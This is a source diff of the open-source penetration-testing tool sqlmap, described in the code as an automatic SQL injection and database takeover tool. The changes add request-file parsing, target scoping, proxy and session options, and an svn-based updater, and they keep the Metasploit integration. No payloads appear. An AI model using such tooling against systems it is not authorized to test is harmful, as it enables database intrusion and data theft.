-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under

lib/core/dump.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -139,13 +139,18 @@ class Dump:
 
             for db, tblData in dbs.items():
                 for tbl, colData in tblData.items():
-                    for col in colData:
+                    for col, dataType in colData.items():
                         if column in col:
                             if db in printDbs:
-                                printDbs[db][tbl] = colData
+                                if tbl in printDbs[db]:
+                                    printDbs[db][tbl][col] = dataType
+                                else:
+                                    printDbs[db][tbl] = { col: dataType }
                             else:
-                                printDbs[db] = { tbl: colData }
-                            break 
+                                printDbs[db] = {}
+                                printDbs[db][tbl] = { col: dataType }
+
+                            continue
 
             self.dbTableColumns(printDbs)
 
@@ -297,9 +302,9 @@ class Dump:
                 self.__write("| %s%s" % (column, blank), n=False)
 
                 if not conf.multipleTargets and field == fields:
-                    dataToDumpFile(dumpFP, "\"%s\"" % column)
+                    dataToDumpFile(dumpFP, "%s" % column)
                 elif not conf.multipleTargets:
-                    dataToDumpFile(dumpFP, "\"%s\"," % column)
+                    dataToDumpFile(dumpFP, "%s," % column)
 
                 field += 1
 

lib/core/exception.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under

lib/core/option.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -35,10 +35,11 @@ import urlparse
 from ConfigParser import ConfigParser
 
 from lib.core.common import getFileType
+from lib.core.common import normalizePath
+from lib.core.common import ntToPosixSlashes
 from lib.core.common import parseTargetUrl
 from lib.core.common import paths
 from lib.core.common import randomRange
-from lib.core.common import sanitizeCookie
 from lib.core.common import sanitizeStr
 from lib.core.data import conf
 from lib.core.data import kb
@@ -103,6 +104,9 @@ def __feedTargetsDict(reqFile, addedTargetUrls):
     port   = None
     scheme = None
 
+    if conf.scope:
+        logger.info("using regular expression '%s' for filtering targets" % conf.scope)
+
     for request in reqResList:
         if scheme is None:
             schemePort = re.search("\d\d[\:|\.]\d\d[\:|\.]\d\d\s+(http[\w]*)\:\/\/.*?\:([\d]+)", request, re.I)
@@ -163,6 +167,9 @@ def __feedTargetsDict(reqFile, addedTargetUrls):
                 data   = line
                 params = True
 
+        if conf.scope:
+            getPostReq &= re.search(conf.scope, host) is not None
+
         if getPostReq and params:
             if not url.startswith("http"):
                 url    = "%s://%s:%s%s" % (scheme or "http", host, port or "80", url)
@@ -264,6 +271,109 @@ def __setGoogleDorking():
         errMsg += "have GET parameters to test for SQL injection"
         raise sqlmapGenericException, errMsg
 
+def __setRequestFromFile():
+    """
+    This function checks if the way to make a HTTP request is through supplied
+    textual file, parses it and saves the information into the knowledge base.
+    """
+
+    if not conf.requestFile:
+        return
+    
+    conf.requestFile = os.path.expanduser(conf.requestFile)
+    
+    infoMsg = "parsing HTTP request from '%s'" % conf.requestFile
+    logger.info(infoMsg)
+
+    if not os.path.isfile(conf.requestFile):
+        errMsg  = "the specified HTTP request file "
+        errMsg += "'%s' does not exist" % conf.requestFile
+        raise sqlmapFilePathException, errMsg
+    
+    fp = open(conf.requestFile, "r")
+    fread = fp.read()
+    fread = fread.replace("\r", "")
+    fp.close()
+    
+    lines = fread.split("\n")
+    
+    if len(lines) == 0:
+        errMsg  = "the specified HTTP request file "
+        errMsg += "'%s' has no content" % conf.requestFile
+        raise sqlmapFilePathException, errMsg
+    
+    if not (lines[0].upper().startswith("GET ") or lines[0].upper().startswith("POST ")):
+        errMsg =  "the specified HTTP request file "
+        errMsg += "doesn't start with GET or POST keyword"
+        raise sqlmapFilePathException, errMsg
+
+    
+    if lines[0].upper().startswith("GET "):
+        index = 4
+    else:
+        index = 5
+
+    if lines[0].upper().find(" HTTP/") == -1:
+        errMsg  = "the specified HTTP request file " 
+        errMsg += "has a syntax error at line: 1"
+        raise sqlmapFilePathException, errMsg
+        
+    host = None
+    headers = ""
+    page = lines[0][index:lines[0].index(" HTTP/")]
+    
+    if conf.method:
+        warnMsg  = "HTTP method previously set. overriding it with "
+        warnMsg += "the value supplied from the HTTP request file"
+        logger.warn(warnMsg)
+    conf.method = lines[0][:index-1]
+
+    for index in xrange(1, len(lines) - 1):
+        line = lines[index]
+        valid = True
+        
+        if len(line) == 0:
+            break
+        
+        headers += line + "\n"
+        
+        items = line.split(': ')
+        if len(items) != 2:
+            valid = False
+        else:
+            if items[0].upper() == "HOST":
+                host = items[1]
+                
+        if not valid:
+            errMsg  = "the specified HTTP request file" 
+            errMsg += "has a syntax error at line: %d" % (index + 1)
+            raise sqlmapFilePathException, errMsg
+    
+    if conf.headers and headers:
+        warnMsg  = "HTTP headers previously set. overriding it with "
+        warnMsg += "the value(s) supplied from the HTTP request file"
+        logger.warn(warnMsg)
+    conf.headers = headers.strip("\n")
+    
+    if fread.find("\n\n") != -1:
+        if conf.data:
+            warnMsg  = "HTTP POST data previously set. overriding it with "
+            warnMsg += "the value supplied from the HTTP request file"
+            logger.warn(warnMsg)
+        conf.data = fread[fread.index('\n\n')+2:].strip("\n")
+    
+    if conf.url:
+        warnMsg  = "target url previously set. overriding it with "
+        warnMsg += "the value supplied from the HTTP request file"
+        logger.warn(warnMsg)
+        
+    if host:
+        conf.url = "%s%s" % (host, page)
+    else:
+        errMsg  = "mandatory HTTP header HOST is missing in "
+        errMsg += "the HTTP request file"
+        raise sqlmapFilePathException, errMsg
+            
 def __setMetasploit():
     if not conf.osPwn and not conf.osSmb and not conf.osBof:
         return
@@ -321,11 +431,11 @@ def __setMetasploit():
             raise sqlmapMissingPrivileges, errMsg
 
     if conf.msfPath:
-        condition  = os.path.exists(os.path.normpath(conf.msfPath))
-        condition &= os.path.exists(os.path.normpath(os.path.join(conf.msfPath, "msfcli")))
-        condition &= os.path.exists(os.path.normpath(os.path.join(conf.msfPath, "msfconsole")))
-        condition &= os.path.exists(os.path.normpath(os.path.join(conf.msfPath, "msfencode")))
-        condition &= os.path.exists(os.path.normpath(os.path.join(conf.msfPath, "msfpayload")))
+        condition  = os.path.exists(normalizePath(conf.msfPath))
+        condition &= os.path.exists(normalizePath(os.path.join(conf.msfPath, "msfcli")))
+        condition &= os.path.exists(normalizePath(os.path.join(conf.msfPath, "msfconsole")))
+        condition &= os.path.exists(normalizePath(os.path.join(conf.msfPath, "msfencode")))
+        condition &= os.path.exists(normalizePath(os.path.join(conf.msfPath, "msfpayload")))
 
         if condition:
             debugMsg  = "provided Metasploit Framework 3 path "
@@ -360,11 +470,11 @@ def __setMetasploit():
 
         for envPath in envPaths:
             envPath    = envPath.replace(";", "")
-            condition  = os.path.exists(os.path.normpath(envPath))
-            condition &= os.path.exists(os.path.normpath(os.path.join(envPath, "msfcli")))
-            condition &= os.path.exists(os.path.normpath(os.path.join(envPath, "msfconsole")))
-            condition &= os.path.exists(os.path.normpath(os.path.join(envPath, "msfencode")))
-            condition &= os.path.exists(os.path.normpath(os.path.join(envPath, "msfpayload")))
+            condition  = os.path.exists(normalizePath(envPath))
+            condition &= os.path.exists(normalizePath(os.path.join(envPath, "msfcli")))
+            condition &= os.path.exists(normalizePath(os.path.join(envPath, "msfconsole")))
+            condition &= os.path.exists(normalizePath(os.path.join(envPath, "msfencode")))
+            condition &= os.path.exists(normalizePath(os.path.join(envPath, "msfpayload")))
 
             if condition:
                 infoMsg  = "Metasploit Framework 3 has been found "
@@ -487,6 +597,8 @@ def __setHTTPProxy():
     global proxyHandler
 
     if not conf.proxy: 
+        if conf.hostname in ('localhost', '127.0.0.1') or conf.ignoreProxy:
+            proxyHandler = urllib2.ProxyHandler({})
         return
 
     debugMsg = "setting the HTTP proxy to pass by all HTTP requests"
@@ -500,7 +612,10 @@ def __setHTTPProxy():
     __port         = None
 
     if len(__hostnamePort) == 2:
-        __port = int(__hostnamePort[1])
+        try:
+            __port = int(__hostnamePort[1])
+        except:
+            pass #drops into the next check block
 
     if not __scheme or not __hostname or not __port:
         errMsg = "proxy value must be in format 'http://url:port'"
@@ -741,8 +856,6 @@ def __setHTTPCookies():
         debugMsg = "setting the HTTP Cookie header"
         logger.debug(debugMsg)
         
-        conf.cookie = sanitizeCookie(conf.cookie, True)
-        
         conf.httpHeaders.append(("Connection", "Keep-Alive"))
         conf.httpHeaders.append(("Cookie", conf.cookie))
 
@@ -798,19 +911,19 @@ def __cleanupOptions():
         conf.delay = float(conf.delay)
 
     if conf.rFile:
-        conf.rFile = os.path.normpath(conf.rFile.replace("\\", "/"))
+        conf.rFile = normalizePath(ntToPosixSlashes(conf.rFile))
 
     if conf.wFile:
-        conf.wFile = os.path.normpath(conf.wFile.replace("\\", "/"))
+        conf.wFile = normalizePath(ntToPosixSlashes(conf.wFile))
 
     if conf.dFile:
-        conf.dFile = os.path.normpath(conf.dFile.replace("\\", "/"))
+        conf.dFile = normalizePath(ntToPosixSlashes(conf.dFile))
 
     if conf.msfPath:
-        conf.msfPath = os.path.normpath(conf.msfPath.replace("\\", "/"))
+        conf.msfPath = normalizePath(ntToPosixSlashes(conf.msfPath))
 
     if conf.tmpPath:
-        conf.tmpPath = os.path.normpath(conf.tmpPath.replace("\\", "/"))
+        conf.tmpPath = normalizePath(ntToPosixSlashes(conf.tmpPath))
 
     if conf.googleDork or conf.list:
         conf.multipleTargets = True
@@ -840,12 +953,15 @@ def __setConfAttributes():
     conf.paramNegative   = False
     conf.path            = None
     conf.port            = None
+    conf.progressWidth   = 54
     conf.retriesCount    = 0
     conf.scheme          = None
     #conf.seqMatcher      = difflib.SequenceMatcher(lambda x: x in " \t")
     conf.seqMatcher      = difflib.SequenceMatcher(None)
+    conf.seqLock         = None
     conf.sessionFP       = None
     conf.start           = True
+    conf.threadContinue  = True
     conf.threadException = False
     conf.wFileType       = None
 
@@ -958,9 +1074,9 @@ def __setVerbosity():
 
     if conf.verbose == 1:
         logger.setLevel(logging.INFO)
-    elif conf.verbose > 1 and conf.eta:
-        conf.verbose = 1
-        logger.setLevel(logging.INFO)
+    elif conf.verbose > 2 and conf.eta:
+        conf.verbose = 2
+        logger.setLevel(logging.DEBUG)
     elif conf.verbose == 2:
         logger.setLevel(logging.DEBUG)
     elif conf.verbose == 3:
@@ -1001,6 +1117,8 @@ def init(inputOptions=advancedDict()):
     __setKnowledgeBaseAttributes()
     __cleanupOptions()
 
+    __setRequestFromFile()
+    
     parseTargetUrl()
 
     __setHTTPTimeout()

lib/core/optiondict.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -27,13 +27,16 @@ optDict = {
             "Target":        {
                                "url":               "string",
                                "list":              "string",
-                               "googleDork":        "string"
+                               "requestFile":       "string",
+                               "googleDork":        "string",
+                               "configFile":        "string"
                              },
 
             "Request":       {
                                "method":            "string",
                                "data":              "string",
                                "cookie":            "string",
+                               "cookieUrlencode":   "boolean",
                                "dropSetCookie":     "boolean",
                                "referer":           "string",
                                "agent":             "string",
@@ -43,9 +46,12 @@ optDict = {
                                "aCred":             "string",
                                "aCert":             "string",
                                "proxy":             "string",
+                               "ignoreProxy":       "boolean",
                                "threads":           "integer",
                                "delay":             "float",
-                               "timeout":           "float"
+                               "timeout":           "float",
+                               "retries":           "integer",
+                               "scope":             "string"
                              },
 
             "Injection":     {
@@ -57,12 +63,13 @@ optDict = {
                                "string":            "string",
                                "regexp":            "string",
                                "eString":           "string",
-                               "eRegexp":           "string"
+                               "eRegexp":           "string",
                              },
 
             "Techniques":    {
                                "stackedTest":       "boolean",
                                "timeTest":          "boolean",
+                               "timeSec":           "integer",
                                "unionTest":         "boolean",
                                "uTech":             "string",
                                "unionUse":          "boolean"
@@ -132,6 +139,7 @@ optDict = {
 
             "Miscellaneous": {
                                "sessionFile":       "string",
+                               "flushSession":      "boolean",
                                "eta":               "boolean",
                                "googlePage":        "integer",
                                "updateAll":         "boolean",

lib/core/progress.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -23,19 +23,20 @@ Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
 from lib.core.common import dataToStdout
+from lib.core.data import conf
 
 class ProgressBar:
     """
     This class defines methods to update and draw a progress bar
     """
 
-    def __init__(self, minValue=0, maxValue=10, totalWidth=54):
+    def __init__(self, minValue=0, maxValue=10, totalWidth=None):
         self.__progBar = "[]"
         self.__oldProgBar = ""
         self.__min = int(minValue)
         self.__max = int(maxValue)
         self.__span = self.__max - self.__min
-        self.__width = totalWidth
+        self.__width = totalWidth if totalWidth else conf.progressWidth
         self.__amount = 0
         self.update()
 

lib/core/readlineng.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under

lib/core/session.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under

lib/core/settings.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -27,8 +27,9 @@ import subprocess
 import sys
 
 # sqlmap version and site
-VERSION            = "0.8-rc4"
+VERSION            = "0.8"
 VERSION_STRING     = "sqlmap/%s" % VERSION
+DESCRIPTION        = "automatic SQL injection and database takeover tool"
 SITE               = "http://sqlmap.sourceforge.net"
 
 # sqlmap logger
@@ -51,10 +52,6 @@ PYVERSION          = sys.version.split()[0]
 # Url to update Microsoft SQL Server XML versions file from
 MSSQL_VERSIONS_URL = "http://www.sqlsecurity.com/FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx"
 
-# Urls to update sqlmap from
-SQLMAP_VERSION_URL = "%s/doc/VERSION" % SITE
-SQLMAP_SOURCE_URL  = "http://downloads.sourceforge.net/sqlmap/sqlmap-%s.zip"
-
 # Database managemen system specific variables
 MSSQL_SYSTEM_DBS   = ( "Northwind", "model", "msdb", "pubs", "tempdb" )
 MYSQL_SYSTEM_DBS   = ( "information_schema", "mysql" )                   # Before MySQL 5.0 only "mysql"

lib/core/shell.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under

lib/core/subprocessng.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under

lib/core/target.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -27,8 +27,6 @@ import time
 
 from lib.core.common import dataToSessionFile
 from lib.core.common import paramToDict
-from lib.core.common import parseTargetUrl
-from lib.core.common import sanitizeCookie
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
@@ -73,7 +71,6 @@ def __setRequestParams():
 
     # Perform checks on Cookie parameters
     if conf.cookie:
-        conf.cookie = sanitizeCookie(conf.cookie)
         conf.parameters["Cookie"] = conf.cookie
         __paramDict = paramToDict("Cookie", conf.cookie)
 
@@ -119,42 +116,50 @@ def __setOutputResume():
     logger.info("using '%s' as session file" % conf.sessionFile)
 
     if os.path.exists(conf.sessionFile):
-        readSessionFP = open(conf.sessionFile, "r")
-        lines = readSessionFP.readlines()
+        if not conf.flushSession:
+            readSessionFP = open(conf.sessionFile, "r")
+            lines = readSessionFP.readlines()
     
-        for line in lines:
-            if line.count("][") == 4:
-                line = line.split("][")
+            for line in lines:
+                if line.count("][") == 4:
+                    line = line.split("][")
     
-                if len(line) != 5:
-                    continue
+                    if len(line) != 5:
+                        continue
     
-                url, _, _, expression, value = line
+                    url, _, _, expression, value = line
     
-                if not value:
-                    continue
+                    if not value:
+                        continue
     
-                if url[0] == "[":
-                    url = url[1:]
+                    if url[0] == "[":
+                        url = url[1:]
     
-                if value[-1] == "\n":
-                    value = value[:-1]
+                    if value[-1] == "\n":
+                        value = value[:-1]
     
-                if url != conf.url:
-                    continue
+                    if url != conf.url:
+                        continue
     
-                if url not in kb.resumedQueries.keys():
-                    kb.resumedQueries[url] = {}
-                    kb.resumedQueries[url][expression] = value
+                    if url not in kb.resumedQueries.keys():
+                        kb.resumedQueries[url] = {}
+                        kb.resumedQueries[url][expression] = value
     
-                resumeConfKb(expression, url, value)
+                    resumeConfKb(expression, url, value)
     
-                if expression not in kb.resumedQueries[url].keys():
-                    kb.resumedQueries[url][expression] = value
-                elif len(value) >= len(kb.resumedQueries[url][expression]):
-                    kb.resumedQueries[url][expression] = value
+                    if expression not in kb.resumedQueries[url].keys():
+                        kb.resumedQueries[url][expression] = value
+                    elif len(value) >= len(kb.resumedQueries[url][expression]):
+                        kb.resumedQueries[url][expression] = value
     
-        readSessionFP.close()
+            readSessionFP.close()
+        else:
+            try:
+                os.remove(conf.sessionFile)
+                logger.info("flushing session file")
+            except OSError, msg:
+                errMsg = "unable to flush the session file (%s)" % msg
+                raise sqlmapFilePathException, errMsg
 
     try:
         conf.sessionFP = open(conf.sessionFile, "a")
@@ -226,6 +231,5 @@ def initTargetEnv():
         kb.unionCount     = None
         kb.unionPosition  = None
 
-    parseTargetUrl()
     __setRequestParams()
     __setOutputResume()

lib/core/unescaper.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under

lib/core/update.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -28,12 +28,18 @@ import re
 import shutil
 import sys
 import tempfile
+import time
 import urlparse
 import zipfile
 
 from distutils.dir_util import mkpath
 from xml.dom.minidom import Document
 
+from subprocess import PIPE
+from subprocess import Popen as execute
+
+from lib.core.common import dataToStdout
+from lib.core.common import pollProcess
 from lib.core.common import readInput
 from lib.core.data import conf
 from lib.core.data import logger
@@ -41,8 +47,6 @@ from lib.core.data import paths
 from lib.core.exception import sqlmapConnectionException
 from lib.core.exception import sqlmapFilePathException
 from lib.core.settings import MSSQL_VERSIONS_URL
-from lib.core.settings import SQLMAP_VERSION_URL
-from lib.core.settings import SQLMAP_SOURCE_URL
 from lib.core.settings import VERSION
 from lib.request.connect import Connect as Request
 
@@ -196,135 +200,59 @@ def __updateMSSQLXML():
         infoMsg += "last update"
         logger.info(infoMsg)
 
-def __createFile(pathname, data):
-    mkpath(os.path.dirname(pathname))
-
-    fileFP = open(pathname, "wb")
-    fileFP.write(data)
-    fileFP.close()
-
-def __extractZipFile(tempDir, zipFile):
-    # Check if the saved binary file is really a ZIP file
-    if zipfile.is_zipfile(zipFile):
-        sqlmapZipFile = zipfile.ZipFile(zipFile)
-    else:
-        raise sqlmapFilePathException, "the downloaded file does not seem to be a ZIP file"
-
-    # Extract each file within the ZIP file in the temporary directory
-    for info in sqlmapZipFile.infolist():
-        if info.filename[-1] != '/':
-            data = sqlmapZipFile.read(info.filename)
-            __createFile(os.path.join(tempDir, info.filename), data)
-
 def __updateSqlmap():
-    infoMsg = "updating sqlmap"
+    rootDir = paths.SQLMAP_ROOT_PATH
+
+    infoMsg = "updating sqlmap to latest development version from the "
+    infoMsg += "subversion repository"
     logger.info(infoMsg)
 
-    debugMsg = "checking if a new version is available"
-    logger.debug(debugMsg)
-
     try:
-        sqlmapNewestVersion, _ = Request.getPage(url=SQLMAP_VERSION_URL, direct=True)
-    except sqlmapConnectionException, _:
-        __sqlmapPath     = urlparse.urlsplit(SQLMAP_VERSION_URL)
-        __sqlmapHostname = __sqlmapPath[1]
+        import pysvn
 
-        warnMsg  = "sqlmap was unable to connect to %s" % __sqlmapHostname
-        warnMsg += ", check your Internet connection and retry"
-        logger.warn(warnMsg)
+        debugMsg = "sqlmap will update itself using installed python-svn "
+        debugMsg += "third-party library, http://pysvn.tigris.org/"
+        logger.debug(debugMsg)
 
-        return
+        def notify(event_dict):
+            action = str(event_dict['action'])
+            index = action.find('_')
+            prefix = action[index + 1].upper() if index != -1 else action.capitalize()
 
-    sqlmapNewestVersion = str(sqlmapNewestVersion).replace("\n", "")
+            if action.find('_update') != -1:
+                return
 
-    if not re.search("^([\w\.\-]+)$", sqlmapNewestVersion):
-        errMsg = "sqlmap version is in a wrong syntax"
-        logger.error(errMsg)
-
-        return
-
-    if sqlmapNewestVersion == VERSION:
-        infoMsg = "you are already running sqlmap latest stable version"
-        logger.info(infoMsg)
-
-        return
-
-    elif sqlmapNewestVersion > VERSION:
-        infoMsg  = "sqlmap latest stable version is %s. " % sqlmapNewestVersion
-        infoMsg += "Going to download it from the SourceForge File List page"
-        logger.info(infoMsg)
-
-    elif sqlmapNewestVersion < VERSION:
-        infoMsg  = "you are running a version of sqlmap more updated than "
-        infoMsg += "the latest stable version (%s)" % sqlmapNewestVersion
-        logger.info(infoMsg)
-
-        return
-
-    sqlmapBinaryStringUrl = SQLMAP_SOURCE_URL % sqlmapNewestVersion
-
-    try:
-        sqlmapBinaryString, _ = Request.getPage(url=sqlmapBinaryStringUrl, direct=True)
-    except sqlmapConnectionException, _:
-        __sqlmapPath     = urlparse.urlsplit(sqlmapBinaryStringUrl)
-        __sqlmapHostname = __sqlmapPath[1]
-
-        warnMsg  = "sqlmap was unable to connect to %s" % __sqlmapHostname
-        warnMsg += ", check your Internet connection and retry"
-        logger.warn(warnMsg)
-
-        return
-
-    debugMsg  = 'saving the sqlmap compressed source to a ZIP file into '
-    debugMsg += 'the temporary directory and extract it'
-    logger.debug(debugMsg)
-
-    tempDir = tempfile.gettempdir()
-    zipFile = os.path.join(tempDir, "sqlmap-%s.zip" % sqlmapNewestVersion)
-    __createFile(zipFile, sqlmapBinaryString)
-    __extractZipFile(tempDir, zipFile)
-
-    # For each file and directory in the temporary directory copy it
-    # to the sqlmap root path and set right permission
-    for root, _, files in os.walk(os.path.join(tempDir, "sqlmap-%s" % sqlmapNewestVersion)):
-        # Just for development release
-        if '.svn' in root:
-            continue
-
-        cleanRoot = root.replace(tempDir, "")
-        cleanRoot = cleanRoot.replace("%ssqlmap-%s" % (os.sep, sqlmapNewestVersion), "")
-
-        if cleanRoot.startswith(os.sep):
-            cleanRoot = cleanRoot[1:]
-
-        for f in files:
-            # Just for development release
-            if f.endswith(".pyc") or f.endswith(".pyo"):
-                continue
-
-            srcFile = os.path.join(root, f)
-            dstFile = os.path.join(paths.SQLMAP_ROOT_PATH, os.path.join(cleanRoot, f))
-
-            if f == "sqlmap.conf" and os.path.exists(dstFile):
-                infoMsg = "backupping configuration file to '%s.bak'" % dstFile
-                logger.info(infoMsg)
-                shutil.move(dstFile, "%s.bak" % dstFile)
-
-            if os.path.exists(dstFile):
-                debugMsg = "replacing file '%s'" % dstFile
+            if action.find('_completed') == -1:
+                print "%s\t%s" % (prefix, event_dict['path'])
             else:
-                debugMsg = "creating new file '%s'" % dstFile
+                revision = str(event_dict['revision'])
+                index = revision.find('number ')
 
-            logger.debug(debugMsg)
+                if index != -1:
+                    revision = revision[index+7:].strip('>')
 
-            mkpath(os.path.dirname(dstFile))
-            shutil.copy(srcFile, dstFile)
+                logger.info('updated to the latest revision %s' % revision)
 
-            if f.endswith(".py"):
-                os.chmod(dstFile, 0755)
+        client = pysvn.Client()
+        client.callback_notify = notify
+        client.update(rootDir)
+    except ImportError, _:
+        debugMsg = "sqlmap will try to update itself using 'svn' command"
+        logger.debug(debugMsg)
 
-    infoMsg = "sqlmap updated successfully"
-    logger.info(infoMsg)
+        process = execute("svn update %s" % rootDir, shell=True, stdout=PIPE, stderr=PIPE)
+
+        dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))
+        pollProcess(process)
+        svnStdout, svnStderr = process.communicate()
+
+        if svnStderr:
+            errMsg = svnStderr.strip()
+            logger.error(errMsg)
+        elif svnStdout:
+            revision = re.search("revision\s+([\d]+)", svnStdout, re.I)
+            if revision:
+                logger.info('updated to the latest revision %s' % revision.group(1))
 
 def update():
     if not conf.updateAll:

lib/parse/__init__.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under

lib/parse/banner.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -45,6 +45,7 @@ class MSSQLBannerHandler(ContentHandler):
         self.__inServicePack = False
         self.__release       = None
         self.__version       = ""
+        self.__versionAlt    = None
         self.__servicePack   = ""
         self.__info          = info
 
@@ -74,18 +75,24 @@ class MSSQLBannerHandler(ContentHandler):
 
     def endElement(self, name):
         if name == "signature":
-            if re.search(" %s[\.\ ]+" % self.__version, self.__banner):
-                self.__feedInfo("dbmsRelease", self.__release)
-                self.__feedInfo("dbmsVersion", self.__version)
-                self.__feedInfo("dbmsServicePack", self.__servicePack)
+            for version in (self.__version, self.__versionAlt):
+                if version and re.search(" %s[\.\ ]+" % version, self.__banner):
+                    self.__feedInfo("dbmsRelease", self.__release)
+                    self.__feedInfo("dbmsVersion", self.__version)
+                    self.__feedInfo("dbmsServicePack", self.__servicePack)
+                    break
 
             self.__version     = ""
+            self.__versionAlt  = None
             self.__servicePack = ""
 
         elif name == "version":
             self.__inVersion = False
             self.__version = self.__version.replace(" ", "")
             
